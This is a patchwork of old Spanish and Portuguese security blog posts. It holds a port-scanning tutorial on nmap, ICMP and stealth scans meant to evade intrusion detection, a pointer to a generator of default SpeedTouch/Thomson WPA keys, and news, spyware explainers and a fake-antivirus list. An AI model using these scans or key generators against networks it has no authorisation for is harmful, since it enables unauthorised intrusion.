SING, es una herramienta por línea de comandos que permite envíar sondeos ICMP configurables por el usuario. SING lleva tiempo ya intentando desbancar al comando PING, ya que implementa una serie de mejoras con respecto a este. SING puede descargarse desde sourceforge. Veamos algunas de las posibilidades que nos ofrece esta herramienta. Probemos en primer lugar a realizar un echo request. Con Nmap podíamos realizar esto en un bloque de red. Con SING, si tomamos como objetivo la dirección de difusión (acaba en 255), obtendremos información de todos los equipos de al red:

Código:
$ sing -echo 192.168.2.255

Vamos a usar ahora SING para enviar mensajes ICMP de solicitud de tiempo (timestamp request):

Código:
$ sing -tstamp 192.168.2.103

Ahora enviaremos mensajes ICMP de solicitud de información (information request):

Código:
$ sing -info 192.168.2.107

Por último veamos cono utilizar SING para enviar mensajes ICMP de solicitud de mascara de direcciones (subnet address mask request):

Código:
$ sing -mask 192.168.2.136

ICMPScan:

Otra herramienta es ICMPScan,que permite enviar mensajes ICMP de tipo 8, 13, 15 y 17 (que son los 4 que hemos visto antes). Este herramienta es realmente útil, quizá para este tipo de barridos es la mejor, ya que es capaz de poner la interfaz de red en modo promiscuo e indentificar así direcciones IP internas que responden a los sondeos enviados por el programa. Lo podéis descargar de http://bindshell.net/tools/icmpscan.

Para instalarlo necesitaréis tener instalado libcap y libdnet. Lo haremos del siguiente modo:

Código:
$ tar zxvf icmpscan.tgz

$ cd icmpscan

$ ./configure

$ make

$ sudo make install

Las funciones de ICMPScan son las siguiente:

Citar
Usage icmpscan [ -EPTSNMAIRcvbn ] [ -A address ] [ -f filename ] [ -i interface ] [ -r retries ] [ -t timeout ] target [...] Options -i, --interface Listen on the specified interface. If unspecified, icmpscan will examine the routing table and select the most appropriate interface for each target address. -c, --promisc Put in interface into promiscuous mode. As this option increases the load on the system in general, it should only be used if spoofing of source packets address is enabled with the "-A" option. -A, --address Specify the source IP address of generated packets. -t, --timeout Specify the timeout, in milli-seconds, before retrying. -r, --retries Specify the number of attempts to elicit a particular ICMP response. -f, --file Read target list from the specified file. -E, -P, --echo, --ping Check of ICMP Echo responses. -T, -S, --timestamp Check for ICMP Timestamp responses. -N, -M, --netmask Check for ICMP Netmask responses. -I, --info Check for ICMP Info responses. -R, --router Check for ICMP Router Solicitation responses. -v, --verbose Increase the output verbosity. -B, --debug

Un ejemplo de uso podría ser este:

Código:
icmpscan -c -t 500 -r 1 192.168.2.0/24

En este comando estamos especificando a ICMPScan que active el modo promiscuo (-c), que ajuste el tiempo de desconexión a 500 milisegundos (-t 500) y que reenvía como mucho una vez cada sondeo (-r 1).

Métodos de rastreo estándar:

Se trata de técnicas de rastreo sencillas y efectivas pero que llevan el inconveniente de producir mucho tráfico y ser muy agresivas, lo que levantará sospechas en el administrador de la red.

Rastreo Vainilla connect():

Os gusta la vainilla? a mi sí, pero eso no viene al caso. Bueno, ha llegado el momento de meternos con algo de teoría sobre el protocolo TCP/IP. Como ya sabréis, el protocolo TCP (Transfer Control Protocol) es un protocolo de control en el que por medio de banderas (flags) se controla la conexión realizada, indicando cuando se inicia, cuando se establece, cuando finaliza... En el protocolo TCP, para indicar que se va a establecer una conexión, se envía un paquete con flag SYN de sincronización de los sequence numbers (números de secuencia) a un puerto determinado, la maquina receptora, si tiene ese puerto abierto, enviará un paquete con flag SYN para sincronizar los números de secuencia y un paquete con flag ACK para afirmar que la conexión ha sido realizada, finalmente, el primer equipo (cliente) enviará un paquete con flag ACK para asegurar que la conexión se ha establecido también por parte del cliente. Véase el siguiente diagrama:



Sin embargo, si el cliente envía un paquete con flag SYN a un puerto que se encuentra cerrado o filtrado, el servidor responderá con un paquete con flag RST. Véase el siguiente diagrama:



Nmap nos permite realizar este tipo de rastreos con el argumento (-sT).

Código:
$ nmap -sT 192.168.167

Rastreo de flag SYN medio abierto:

Como ya hemos comentado, para sincronizar una conexión entre dos equipos utilizando el protocolo TCP/IP, el cliente manda al servidor un SYN, el servidor responde con un SYN/ACK en el caso de que el puerto esté abierto y con un RST si está cerrado. En el caso de que esté abierto y se envíe el SYN/ACK, el cliente concluye con un ACK. La técnica de rastreo de flag SYN medio abierto se distingue de la Vainilla connect() en que esta última, si el puerto está abierto, el cliente responde con un flag ACK. En SYN medio abierto, en caso de que se encuentre abierto el puerto, en lugar de responder con un ACK se reponde con un RST, lo que proboca que se reinicie bruscamente la conexión.

Por desgracia o por fortuna, estos dos métodos son fácilmente detectados por los IDS (Intrussions Detection System), así que no son aconsejables en caso de querer realizar un análisis sigiloso.





En la primera imagen podemos ver como se el servidor responde al SYN enviado por el cliente con un RST, indicando que el puerto está filtrado o cerrado. En la imagen 2, el cliente envía un RST como tercera parte de la comunicación TCP.

Para realizar estos rastreos podemos utilizar Nmap con el argumento -sS:

Código:
$ nmap -sS 192.168.2.156

En Nmap se puede ajustar la política de tiempos con el argumento "-T". Con el argumento "-T sneaky" se puede llegar a burlar la seguridad de los firewalls. Esto consiste en enviar muy rápidamente paquetes SYN a diferentes puertos, lo que provocará un desbordamiento de SYN (un tipo de DoS).

Una herramienta muy eficaz es Scanrand, producto de Paketto Keiretsu de Dan Kaminsky. En http://doxpara.com/read.php/code/paketto.html podéis encontrar información relevante sobre el proyecto así como utilidades interesantes. Las opciones del programa son las siguientes:

Citar
scanrand 1.10: Stateless TCP Scanner w/ Inverse SYN Cookies(HMAC-SHA1/32 in SEQ) Component of: Paketto Keiretsu 1.10; Dan Kaminsky (dan@doxpara.com) Example: scanrand -b10M 10.0.1.1-254:80,20-25,139 Def. Ports: Use [quick/squick/known/all] instead of explicitly naming ports Options: -S/-L: Only send requests / Only listen for responses -e/-E: Show negative responses / Only show negative responses -t [timeout]: Wait n full seconds for the last response (10s) -b[bandwidth]: Limit bandwidth consumption to n b/k/m/g bytes(0) (0 supresses timeouts or maximizes bw utilization) -N/-NN : Enable name resolution (Prefer Source/Dest) -v : Mark packets being sent, as well as received -vv : Output full packet traces to stderr Addressing: -d [device]: Send requests from this L2 hardware device -i [source]: Send requests from this L3 IP address -p [ port]: Send requests from this L4 TCP Port -s [ seed]: Use prespecified seed for scan verification -f [ file]: Read list of targets from file Experiments: -l [ttl-ttl]: Statelessly TCP Traceroute -D : Distco (Distance Discover) via forced RSTs -c : Try checking Inverse SYN Cookie on Traceroute Notes: Use Control-C to exit before scanrand times out. Be sure to use a longer timeout for slow scans! [n]: estimated network distance from target host. Be careful about available bandwidth -- use -b!

Veamos un ejemplo de uso (para ejecutarlo deberéis tener permisos root):

Código:
$ scanrand 192.168.2.1-254:20-25,80,443

Métodos de rastreo sigilosos:

Estos tipos de métodos, aprovechan la estructura de la propia pila TCP/IP para escanear sin ser detectados (en algunas ocasiones, ya que dependerá del IDS y sobretodo del SO). Bueno, vamos al grano. Como ya sabéis, cuando en los métodos anteriores enviábamos paquetes SYN a un host y este nos repondía con el conocido SYN/ACK, daba a conocer que el puerto en cuestión estaba abierto, pero cuando respondía con un RST, daba a entender que el puerto estaba cerrado o filtrado. Muchos IDS son capaces de detectar paquetes con el indicador SYN recibidos y lo que harán será avisar al administrador del sistema diciéndole: "Eh! que están evaluándonos!", a lo que el administrador del sistema responderá tomando mayores medidas de seguridad. Esto desde el punto de vista del atacante puede resultar bastante tedioso y si no queremos levantar sospechas, lo que tendremos que hacer es utilizar métodos sigilosos de rastreo.

Rastreo TCP con indicador inverso:

Este rastreo va a consistir en enviar sondeos con indicadores de tipo FIN, URG, PUSH y NULL. Existen tres tipos de sondeos:

Sondeo FIN = Consistirá en enviar paquetes con el indicador FIN.
Sondeo XMAS = Consistirá en enviar paquetes con los indicadores FIN, URG y PUSH.
Sondeo NULL = Consistirá en enviar paquetes con el indicador NULL.

Cuando enviemos uno de estos indicadores, si el puerto se encuentra abierto, no se obtendrá respuesta alguna. sin embargo, si el puerto se encuentra cerrado, recibiremos un paquete RST. Esto viene definido por el estander RCF 793, que como ya he dicho, indica que si no se percibe ninguna respuesta del puerto analizado, significa que el puerto está abierto o que el equipo se encuentra apagado. Lo que estamos haciendo es enviar paquetes "basura" que dificilmente van a ser detectados por los IDS.

Sin embargo he de deciros que Microsoft (para variar) no respeta este estándar, por lo que no se recbe respuesta alguna cuando se intenta conectar a un puerto cerrado. Por eso esta técnica sólo es eficaz con plataformas UNIX.





Para realizar uno de estos sondeos podemos utilizar Nmap con sus respectivos argumentos:

Sondeo FIN = se utilizará el argumento -sF.
Sondeo XMAS = se utilizará el argumento -sX.
Sondeo NULL = se utilizará el argumento -sN.

Rastreo con indicador ACK:

Otra técnica sigilosa es la de enviar paquetes con indicador ACK y luego analizar la información de los paquetes RST recibidos. Esta técnica explota vulnerabilidades de la pila TCP/IP de sistemas BSD. Existen dos modos de hacerlo:

Análisis del TTL = El TTL es el tiempo de vida de los paquetes recibidos (Time To Live). Para realizar este ataque, hay que enviar miles de paquetes con indicador ACK a diferentes puertos del equipo víctima. Después habrá que analizar los resultados. Nmap nos permite hacer esto con el argumento "sA". Con Hping2 también podemos construir nuestros paquetes y enviarlos aunque hacerlo de forma manual es bastante más tedioso. A la hora de analizar las respuestas habrá que fijarse en el TTL del paquete.
Análisis del campo WiNDOW = Para realizar este ataque se llevará a cabo un procedimiento similar al anterior, enviando muchos paquetes ACK y analizando el campo WINDOW del paquete respuesta. Por norma general, los puertos cerrados tienen un valor WINDOW de 0. Para realizarlo podemos utilizar Hping2 y Nmap con el argumento -sW.

Métodos de rastreo con suplantación de terceros:

En un principio tenía pensado añadir a esta guía información sobre el ratreo basado en el análisis del identificador ip de la cabecera del paquete. Sin embargo ese tema es tan amplio que se dejará para más adelante. Miraremos sin embargo dos técnicas realmente útiles y extremádamente anónimas: Rastreo de rebote FTP o FTP bounce, y rastreo de rebote en proxy.

Rastreo de rebote FTP (FTP bounce):

Muchos servidores web tienen su propio servidor FTP y en muchas redes podemos localizar ordenadores que hacen de servidores de archivos y utilizan el protocolo FTP para desarrollar dicha misión. Es posible que tengamos localizado un servidor FTP desactualizado que permita realizar este tipo de ataques. Existe une defecto en la forma en la que los servidores FTP gestionan las conexiones mediante el comando PORT, que envía datos a equipos y puertos especificados por el usuario. Os pongo algunos servidores que en su configuración estándar se ven afectados por esta vulnerabilidad:

Caldera Linux 1.2 (y versiones anteriores).
FreeBSD 2.1.7 (y versiones anteriores).
HP-UX 10.10 (y versiones anteriores).
IBM AIX 4.3 (y versiones anteriores).
SCO OpenServer 5.0.4 (y versiones anteriores).
Slackwaare 3.3 (y versiones anteriores).
Solaris 2.6/SunOS 5.6 (y versiones anteriores).


La siguiente imagen muestra la estructura del ataque:



Rastreo de rebote con proxy:

Todos sabemos que es un proxy y para qué lo podemos utilizar. En este caso vamos a realizar un escanéo utilizando un proxy para anonimizar nuestra IP. Existe una herramienta realmente buena llamada ppscan.c que permite realizar este tipo de escaneos. El uso es el siguiente:

Código:
$ ./ppscan

Proxy Port Scanner v1.2 by Bronc Buster of LoU Usage: ./ppscan

Esta herramienta podéis descargarla de http://n3t-datagrams.net/tools/ppscan.c. Antes estaba disponible en http://phreak.org/, pero parece ser que lo han eliminado. Lo que descargaréis es el código fuente del programa.
Creditos:sh4van3

Remover virus msn

Este pequeno software ajuda-te a eliminar o vírus comuns no Windows Live Messenger, sem necessidade de instalação.

Alguns anti-vírus como o Avira Free, e o Panda Cloud detectam alguns vírus destes. Este vírus actuam nas suas mensagens, mandando frases obscenas, tal como imagens, e outras vezes, o efeito repetitivo “olha a foto”. Não aceite se a pessoa não disser o que é.

Gratuito / Download Aqui
Sistema:

  • Windows Vista, versões 32-bit e 64-bit
  • Windows XP Professional x64 Edition (Service Pack 2)
  • Windows XP (Professional ou Home Edition) (Service Pack 2 ou mais recente)
  • Windows 7 ( 32-bit e 64-bit)
  • Empresa: Info Spyware


    geek place

    SpeedTouch e Thomson default WPA keys


    Como todos sabemos, o ISP (meo) fornece-nos router speedtouch thomson e,quando fazem a instalação deixam a password (WPA) de acesso à rede wi-fi, por default... Assim sendo a maioria não se dá ao trabalho de alterar pensando que é uma password segura, então para quem pense desta forma este site gera as defaults passwords dos routers basta colocoar os 6 caracters que estao a frente da palavra speedtouch ou thomson...Ou seja basta colocar o ssid

    e vai aki tb um software em DOS para quem tiver o Windows e quira utilizar sem nessecitar de usar o site a cima referido

    software: http://www.megaupload.com/?d=SIW6043E


    site: http://www.nickkusters.com/SpeedTouch.aspx


    Isto pode ser usado por todos na sua rede por isso tenha os devidos cuidados para evitar qualquer invasão. A melhor forma de testar a sua rede é invadindo-a.

    Spyware


    O que é?
    Um spyware é um programa que consiste em recolher informações da vitima e dos seus costumes e envia-os para uma identidade externa, isto sem o seu conhecimento. Agora perguntam, "Porque é que não são cavalos troia já que roubam informações". A resposta é que os spywares diferem-se por não ter o objectivo de o computador ser controlado por um cracker (alguem com intenções más e com um vasto conhecimento de computadores).

    Quem os cria?

    Agora quem e porque tem o trabalho de inventar um spyware e esconde-lo na nossa maquina?
    Alguns são criados por firmas comerciais querem monitorizar o hábito das "vitimas" para terem conhecimento dos seus costumes e vender este dados pela internet. Costumam produzir muitas variantes de seus spywares e dificultando mais a sua remoção e reconhecimento.
    Tambem á aqueles que têm o objectivo de roubar dados confidenciais como por exemplo dados bancários e roubam arquivos pessoais. Por isso um spyware chega a ser bastante perigoso.

    Como chegam a nós?

    Normalmente eles vem introduzidos sem nosso conhecimento em programa Freeware ou shareware. E " obrigam-nos" a comprar uma versão mais completa etc. Obrigam-nos entre aspas, pois á sempre alguma maneira de retirar um spyware. Tambem vêm em e-mais e plug ins para os navegadores.

    Os tipos de spyware

    Adwares- Normalmente inclui-se os adwares no estudo dos spywares, pois são parecidos na sua forma de infectar e desinstalar podemos caracteriza-los como um sub grupo. Toda a gente conhece adwares mesmo não sabendo o que são pois quase todos já viram aquelas publicidades a aparecerem do nada.

    Ransomware- São uma espécie de "raptores" pois raptam todos os conteúdos do disco rígido e os criadores pedem um pagamento pelo "resgate" dos dados. São ferramentas extremamente proibidas de crime e extorsão e alguns dos mais conhecidos são: Gpcode-B e PGPCoder.

    Prevenir e remover

    Existem sempre anti-spywares como o Spy-bot que recomendo, o super anti spyware, o anti spyware incluido nos anti-virus como Kaspersky, nod32 etc.

    Tambem existem tools de removoção de spywares que gostam do quentinho do seu computador.

    E como diz o ditado "è melhor prevenir que remediar" é preciso ter cuidado com os programas que instalamos e certeficar que são fidedignos e que confia 100% neles. Existem tambem alguns sites de download que dizem que se certificam que o programa é 100%livre de spywares levando o usuario a fazer o donwload com um spy lá dentro. Isto nao quer dizer que alguns sites digam mesmo não digam mesmo a verdade.
    Ter também cuidado com plug ins para o navegador.

    Espero que este topico tenha servido de algo para ajudar a conhecer esta "praga". Se não concordarem com alguma coisa dita por favor expressem-se por comentário.

    MD#230 - A Falha do Internet Explorer

    Mais uma vez hackers encontraram e pretendem tirar partido de uma falha de segurança no Internet Explorer. Este programa, por ser tão utilizado em todo o mundo é uma mina para os piratas. Para a mais recente falha, há actualmente três soluções possíveis:

    1 - Activar a segurança máxima no Internet Explorer (e mesmo assim pode não chegar)

    2 - Deixar de usar a net até que a Microsoft encontre uma solução

    3 - Instalar e usar outro programa. Sugiro o Firefox: http://www.mozilla-europe.org/pt/firefox/.

    Quanto aos problemas gerados por esta quebra na segurança, para já não são muito preocupantes. Parece que através de 10 mil sites asiáticos, os hacker ficam a saber os códigos que aqueles internautas usam para jogar online determinados jogos. Se fossem contas bancárias e palavras-passe, o caso mudava de figurino.

    Falha critica afecta todas as versões do IE



    Todas as versões do Internet Explorer contêm erros que podem ser explorados de forma maliciosa, confirmou a Microsoft que pede que os utilizadores naveguem em modo de segurança uma vez que qualquer uma das edições do browser - Internet Explorer 5.01, IE6, IE7 e IE8 Beta 2 (que ainda não circula de forma livre nos canais tradicionais) - está vulnerável.

    A Microsoft ainda não possui qualquer patch de segurança disponível para corrigir estas falhas e o caso merece especialmente atenção para os utilizadores que usem o IE no Windows 2000, XP, Server 2003 ou no Server 2008.

    No entanto, a fabricante salienta que está a trabalhar na correcção das vulnerabilidades através dos programas MAPP - Microsoft Active Protections Program - e MSRA - Microsoft Security Risk Assessment.

    FireFox é o Mais Inseguro de 2008


    O browser FireFox, da Mozilla, foi eleito como a aplicação mais "vulnerável" de 2008. Segundo a Bit9, tanto o FireFox 2.x e o FireFox 3.x conseguiram ser alvo de 40 vulnerabilidades durante os últimos 12 meses.

    A lista fica completa (no total 12 produtos analisados) com aplicações com nomes sonantes como iTunes, Norton e Skype. Aqui fica a lista completa :

    1. Firefox, da Fundação Mozilla
    2. Flash e Acrobat, da Adobe
    3. VMware Player e VMware Workstation, da VMware
    4. Java Runtime Environment, da Sun
    5. QuickTime, Safari e iTunes, da Apple
    6. Produtos Norton, da Symantec
    7. OfficeScan, da Trend Micro
    8. Produtos Citrix, da Citrix
    9. Aurigma e Lycos, gestores de imagens
    10. Skype, da Skype
    11. Yahoo! Assistant, da Yahoo!
    12. Windows Live Messenger, da Microsoft

    A Bit9 é uma empresa de segurança, Norte-Americana, que se dedica a analisar o impacto das vulnerabilidades das aplicações nos ambientes empresariais. A empresa recomenda que as empresas estabeleçam politicas de segurança de forma a conseguirem evitar a utilização de aplicações com vulnerabilidades.

    O que sistemas de busca podem descobrir sobre nós


    O Google divulgou seu mapa nacional de cérebros e apetites para 2008, e ao que parece muita gente nos Estados Unidos perguntou na Internet "o que é amor" e "como beijar", ao longo do ano.

    E, para permitir um foco mais estreito, o Google também ofereceu uma lista de solicitações de busca propostas por pessoas de Nova York. Ao que parece os moradores da cidade de Nova York estão em busca de algo diferente. Em uma lista dos 10 assuntos que registraram mais ascensão como termos de busca este ano, o país em geral parecia estar interessado na Fox News e em David Cook, o ganhador da mais recente versão do programa de calouros American Idol.

    Nenhum dos dois assuntos entrou na lista de Nova York. Mas a lista nacional tampouco incluía dois dos itens mais procurados na cidade: Walter Gropius, o fundador do estilo Bauhaus de arquitetura, e o Large Hadron Collider (LHC), um túnel subterrâneo de 27 quilômetros localizado sob a fronteira da Suíça, construído para promover colisões de prótons em velocidade próxima à da luz.

    Sem dúvida deve existir alguém no ciberespaço capaz de explicar a disparada no interesse por Gropius na cidade. O arquiteto morreu em 1969 e só tem um edifício notável em Nova York, o antigo edifício da Pan Am.

    É fácil compreender o interesse pelo LHC. Havia a preocupação de que a colisão de prótons criaria instantaneamente um buraco negro, mas a boa notícia que passou quase ignorada é o fato de que não surgiu - ou desapareceu? - qualquer buraco negro em 10 de setembro, o dia em que a máquina foi ativada. O interesse pelo LHC entre os usuários do serviço de busca logo despencou, e as pessoas passaram a concentrar suas ansiedades e preocupações em "Wall Street". (E Wall Street, aliás como o LHC, está com defeito.)

    Essas listas supostamente serviriam para revelar o que o Google define como o "zeitgeist" de 2008, ainda que não seja grande surpresa que as pessoas se tenham interessado por Sarah Palin e Barack Obama. No entanto, elas também servem para revelar o número de detalhes pessoais que as pessoas hoje fornecem aos serviços de buscas e às empresas que os operam, sem que estejam muito cientes disso.

    As listas, diz o tenente-coronel Greg Conti, professor de ciência da computação na Academia Militar de West Point, "são apenas as grandes atividades, em escala tsunami - as grandes ondas nas buscas online".

    Conti, autor de um livro que tenta avaliar o quanto o Google sabe sobre cada um de seus usuários, alega que as ferramentas internas de que a empresa dispõe tornam possível desenvolver quadros detalhados sobre os interesses pessoais dos usuários, e não apenas descobrir que milhões de meninas estão procurando informações sobre a cantora Miley Cyrus.

    "Um retrato completo de cada pessoa como indivíduo e de cada companhia emerge - as inclinações políticas, os problemas médicos, as aquisições de negócios sinalizadas por buscas de empregos", ele diz. "Se fosse possível avaliar cada pesquisa realizada, o resultado seria assustador. As pesquisas podem ser associadas de maneira muito precisa a um indivíduo. Pode-se observar todas as escalas, da molécula individual de água ao tsunami".

    A informação parece gratuita na web, mas na verdade é trocada por pequenas porções de dados que são úteis para as empresas. O Google registra os endereços de Internet gerados pelos computadores dos usuários, os cookies que os usuários aceitam, o modelo de navegador em uso e o sistema operacional do computador, diz Heather Spain, porta-voz da empresa.

    Depois de nove meses, ela acrescenta, o Google "anonimiza" os dados que recolheu.

    "Quando chega o momento, nós eliminamos permanentemente os dois dígitos finais do endereço IP e partes dos números dos cookies", ela diz. "Isso quebra o elo entre a busca e o computador da qual ela foi gerada. É um processo semelhante à maneira pela qual as operadoras de cartões de crédito substituem os números por traços em seus recibos para reforçar a segurança de seus clientes".

    Conti diz que pouca gente faz idéia da trilha que deixa ao percorrer a Internet. "As pessoas tendem a pensar que deixam traços apenas em sites nos quais confiam", ele diz, mas muitos sites contêm códigos não visíveis, como o do Google Analytics, que pode acompanhar o movimento de usuários pela rede.

    As listas de buscas mais populares, diz Spain, resultam de consultas realizadas por milhões de pessoas e não representam ameaça à privacidade individual. As ferramentas que o Google oferece aos usuários para analisar buscas em geral só tornam possível estudar as buscas em base de Estado a Estado, e não em cidades individuais.

    Por enquanto, fornecer informações pessoais é o preço que se deve pagar pela possibilidade de fazer perguntas e receber respostas rapidamente. Todas as medidas de proteção à privacidade tendem a complicar o processo.

    "Eu falo sobre o assunto em conferências de hackers", diz Conti, "e se esse pessoal diz que alguma coisa é difícil de usar, pode acreditar que é difícil. A verdade é que não existe solução no momento - exceto a abstinência. E se você optar por não usar ferramentas de Internet, não estará vivendo no século 21".

    Trojan disfarçado para Firefox


    A empresa BitDefender descobriu uma malware disfarçado de uma extensão chamada Greasemonkey para firefox intitulado como "Trojan.PWS.ChromeInject.A" localizado na pasta de "Complementos" ou "Add-ons" do Firefox. O aplicativo é executado toda vez que o navegador abre e permite roubar senhas de bancos. Esta complemento normalmente adiciona funcionalidades extras às páginas HTML exibidas pelo navegador.O anti-vírus BitDefender já está apto para caçar e eliminar este Trojan e em breve outros anti-vírus o farão.
    Os pesquizadores afirmaram que com o aumento da popularidade e do uso do navegador faz com que se torne cada vez mais o alvo de Hackers.


    Se não tem a certeza que o seu anti-vírus consegue caça-lo o melhor é mesmo não descarregar extensões de sites que não sejam certeficados pela Mozilla.

    Apple começa a ser ameaçado por malware

    Apple começou a recomendar ferramentas de anti-virus no passado Novembro para pela primeira vez proteger os utilizadores de Macs, seguidos de uma string de malware desenhada para computadores específicados.

    Apple ripostou com a recomendação de um software da Intego, Symantec e McAfee, onde poderá descarregar Aqui

    720 antivirus e antispywares falsos!!


    Aqui vai uma lista de 720 antivirus e antispywres falsos que andam ai a correr na internet po pexoal sacar!... Por isso cuidado!!!

    ---- 0/9 ----
    • 1 Spyware Killer
    • 1 Click Spy Clean
    • 100 Percent Anti-Spyware
    • 1-2-3 Spyware Free
    • 1stAntiVirus
    • 2004 Adware/Spyware Remover & Blocker
    • 2-AntiSpyware


    ---- A ----

    • about:blank 2005
    • Ad Butcher
    • AdArmor
    • AdDriller
    • AddwareRemover
    • Addwere
    • Ad-Eliminator
    • AdEradicator
    • AdFlusher
    • Ad-Protect
    • AdProtector
    • Ad-Purge Adware & Spyware Remover
    • ADS Adware Remover
    • Ads Alert
    • AdScrub
    • AdStriker
    • AdsZapper
    • Advanced Antivirus
    • Advanced Spyware Remover
    • AdvancedCleaner
    • AdvancedXPDefender
    • Adware & Spyware Firewall
    • Adware Agent
    • Adware Bazooka
    • Adware Butcher
    • Adware Cops
    • Adware Filter
    • Adware Hitman
    • Adware Punisher
    • Adware Remover
    • Adware Remover Gold
    • Adware Sheriff
    • AdWare SpyWare Blocker & Removal
    • Adware Striker
    • Adware/Spyware Remover
    • AdwareAlert
    • AdwareBlaster
    • AdwareBlocker
    • AdwareCatch
    • AdwareCatcher
    • AdwareCheck
    • AdwareChecker
    • AdwareCleaner
    • AdwareCrusher
    • AdwareDelete
    • AdwareDeluxe
    • AdwareDestroyer
    • AdwareDetect
    • AdwareEradicator
    • AdwareEraser
    • AdwareFinder
    • AdwareFlush
    • AdwareFlusher
    • AdwareGuard
    • AdwareGuardian
    • AdwareHunter
    • AdwareInspector
    • Adware-Nuker
    • AdwarePatrol
    • AdwarePolice
    • AdwarePro
    • AdwarePunisher
    • AdwareRemover
    • AdwareSafe
    • AdwareSafety
    • AdwareSanitizer
    • AdwareScanner
    • AdwareScrub
    • AdwareScrubber
    • AdwareSheriff
    • AdwareShield
    • AdwareShredder
    • AdwareSpy
    • AdwareSquash
    • AdwareSquasher
    • AdwareStopper
    • AdwareStriker
    • AdwareSweep
    • AdwareSweeper
    • AdwareTerminator
    • AdwareTools
    • AdwareWasher
    • AdwareWatch
    • AdwareWipe
    • AdwareX
    • AdwareX Eliminator
    • AdwareZapper
    • Ad-Where 2005
    • Agent Spyware
    • AgentSpyware
    • AGuardDog Adware/Spyware Remover
    • AGuardDog Suite
    • AlertSpy
    • AlfaCleaner
    • Anti Virus Pro
    • AntieSpiaDorado
    • AntieSpionsPack
    • AntiMalwareGuard
    • AntiGusanos2008
    • AntiSpionage
    • AntiSpionagePro
    • AntiSpy
    • AntiSpy Advanced
    • AntiSpyBoss
    • AntiSpyCheck
    • AntiSpyGolden
    • AntiSpyGuard
    • AntiSpyKit
    • AntiSpyPro
    • AntispySpider
    • AntiSpyStorm
    • AntiSpyStorm2008
    • Anti-Spyware Blocker
    • AntiSpyware Soldier
    • Antispyware Suite
    • AntiSpywareBot
    • AntiSpywareControl
    • AntiSpywareDeluxe
    • Antispywareexpert
    • AntiSpywareMaster
    • AntiSpywareShield
    • AntiSpywareSuite
    • AntiSpywareUpdates
    • AntiSpyZone
    • AntiThiefWare
    • AntiVer2008
    • AntiVermeans
    • AntiVermins
    • AntiVerminser
    • AntiVirGear
    • AntiVirProtect
    • Anti-Virus and Spyware
    • Anti-Virus and Trojan
    • Antivirus Email
    • AntiVirus Gold
    • AntiVirus Golden
    • Antivirus Protection
    • AntiVirus Protector
    • Antivirus Solution
    • AntiVirusAdvance
    • AntivirusForAll
    • AntivirusGold
    • AntiVirusPCSuite
    • Antivirus 2008 PRO
    • AntiWorm2008
    • AntiWurm2008
    • AnyCleaner
    • ArmorWall
    • AVSystemCare
    • Awola
    • Antivirus 2009

    ---- B ----

    • BazookaBar
    • BestGuardPlatinum
    • BestsellerAntivirus
    • Botsquash
    • BPS Security Console
    • BPS Spyware & Adware Remover
    • BPS Spyware Remover
    • BraveSentry
    • BreakSpyware
    • BugsDestroyer
    • BugDoctor

    ---- C ----

    • CheckFlow CheckSpy & Anti Spyware 2005
    • CleanerMaster
    • CleanX
    • CoffeeCup Spyware Remover
    • Consumer Identity
    • ContraVirus
    • Copperhead AntiSpyware
    • CryptDrive
    • CurePcSolutions Anti-Spyware
    • CyberDefender

    ---- D ----

    • DeluxeComunications
    • DataHealer
    • DefenseAntiMalware
    • Defenza
    • Deus Cleaner
    • DIARemover
    • DioCleaner
    • DiscErrorFree
    • DisqudurProtection
    • Doctor Adware
    • Doctor Adware Pro
    • Doctor Alex
    • Doctor Antivirus 2008
    • DoctorAdwarePro
    • DoctorCleaner
    • DoctorVaccine
    • DrAntispy
    • Draze Toolbar
    • DriveCleaner
    • DriveCleaner 2006
    • DrProtection

    ---- E ----

    • eAcceleration/Veloz Stop-Sign
    • EAdwareKiller
    • EAdwareRemoval
    • EAdwareRemover
    • EAntiSpyware
    • Easy Erase Spyware Remover
    • Easy SpyRemover
    • Easy Spyware Killer
    • Easy Spyware Scanner
    • EasySprinter
    • Elimiware
    • Emco Malware Bouncer
    • ErrClean
    • Error Fix
    • Error Fixer
    • Error Scan and Fix
    • ErrorDigger
    • ErrorDoctor
    • ErrorInspector
    • ErrorKiller
    • ErrorNuker
    • ErrorProtector
    • ErrorSafe
    • ErrorSafer
    • ESpywareBlocker
    • ESpywareDefender
    • ESpywareKiller
    • ESpywareRemoval
    • ESpywareRemover
    • ESpywareScanner
    • ETD Security Scanner
    • Evidence Eliminator
    • Evidence Eraser Pro
    • ExpertAntivirus
    • EZVideo

    ---- F ----

    • FastCleaner
    • Files Secure 2.2
    • Filterprogram
    • FiltroDeTrojan
    • Fix Registry Errors
    • FixerAntispy
    • Fixiter
    • Flobo Free Anti Spyware Clean
    • Flobo Spyware Clean
    • Free Spyware Adware Scanner and Remover
    • Freeze.com AntiSpyware
    • Froggie Scan
    • FullSystemProtection

    ---- G ----

    • GarbageClean
    • GoldenAntiSpy
    • GoodbyeSpy
    • GuardBar
    • GuardCenter

    ---- H ----

    • HardDiskVakt
    • HitSpy
    • HitVirus

    ---- I ----

    • IC Spyware Scanner
    • IE AntiVirus
    • IE Defender
    • IHateAdware
    • InfeStop
    • Intelligent Spyware Cleaner
    • Internet Cleanup
    • InternetAntiSpy
    • InternetShield
    • iSpyKiller

    ---- J ----

    • JC Spyware Remover & Adware Killer

    ---- K ----

    • KaZaaP
    • Keep Your Privacy
    • KeineGefahr
    • KillAllSpyware
    • KillAndClean
    • KillSpy
    • KnowHowProtection

    ---- L ----

    • LastDefender
    • LiveAntispy
    • LiveKill
    • LiveProtect
    • LiveProtection

    ---- M ----

    • MacroAV
    • MagicAntispy
    • Malware Bell
    • Malware Scanner
    • Malware Stopper
    • MalwareAlarm
    • MalwareBot
    • MalwareBurn
    • MalwareCore
    • MalwareDestructor
    • MalwarePatrol Pro
    • MalwarePro
    • MalwareProtector 2008
    • MalwareScanner
    • MalwareStopper
    • MalwaresWipeds
    • MalwareWar
    • MalwareWipe
    • MalwareWipe Pro
    • MalwareWiped
    • MalwareWiper
    • Malwarrior
    • MalWhere
    • Max Privacy Protector
    • MaxNetShield (MNS Spyware Remover & History Eraser)
    • MenaceRescue
    • MenaceSecure
    • MicroAntivirus
    • Mr.AntiSpy
    • My Privacy
    • MyBugFreePc
    • MyNetProtector
    • MyPCTuneUp
    • MySpyFreePC
    • MySPyProtector
    • Mirar
    • Movieland

    ---- N ----

    • NadadeVirus
    • NeoSpace
    • Neospace Internet Security
    • NetBrowserPro
    • Netcom3 Cleaner
    • NetPumper
    • NetSpyProtector
    • NoAdware
    • No-Spy / Sin-Espías ** (ver nota 1)
    • NoSpyX
    • NoWayVirus

